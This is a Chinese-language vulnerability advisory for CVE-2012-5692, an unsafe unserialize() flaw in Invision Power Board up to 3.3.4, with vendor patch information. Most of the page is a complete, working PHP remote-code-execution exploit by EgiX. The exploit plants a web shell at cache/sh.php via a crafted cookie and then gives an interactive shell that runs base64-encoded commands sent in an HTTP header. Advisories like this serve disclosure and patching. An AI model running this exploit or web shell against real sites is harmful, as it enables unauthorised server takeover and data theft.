发布日期：2012-10-25
更新日期：2012-11-05

受影响系统：

invisionpower Invision Power Board <= 3.3.4

描述：

---

BUGTRAQ  ID: 56288
CVE ID: CVE-2012-5692

Invision Power Board是由PHP+MySQL架构的论坛程序。

Invision Power Board v3.1.x、3.2.x、3.3.x的实现上存在安全漏洞，用户通过cookie发送的输入没有正确过滤即用在unserialize()调用中。攻击者可发送代表对象数组的序列化字符串，通过"dbMain"类的"__destruct()"方法执行任意PHP代码。要利用此漏洞需要启用short_open_tag。

<*来源：EgiX （n0b0d13s@gmail.com）
  
  链接：http://www.exploit-db.com/exploits/22398/
        http://osvdb.org/show/osvdb/86702
        http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

*/

error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /ipb/\n";
    die();
}

list($host, $path) = array($argv[1], $argv[2]);

$packet  = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
    
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ?  $m[1] : '';

class db_driver_mysql
{
    public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}

$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';

$packet  = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";

http_send($host, $packet);

$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");

while(1)
{
    print "\nipb-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

建议：

---

厂商补丁：

Invision PS
-----------
Invision PS已经为此发布了一个安全公告（371625-ipboard-31x-32x-and-33x-critical-security-update）以及相应补丁:

371625-ipboard-31x-32x-and-33x-critical-security-update：IP.Board 3.1.x, 3.2.x and 3.3.x Critical Security Update

链接：http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/

浏览次数：3927
严重程度：0（网友投票）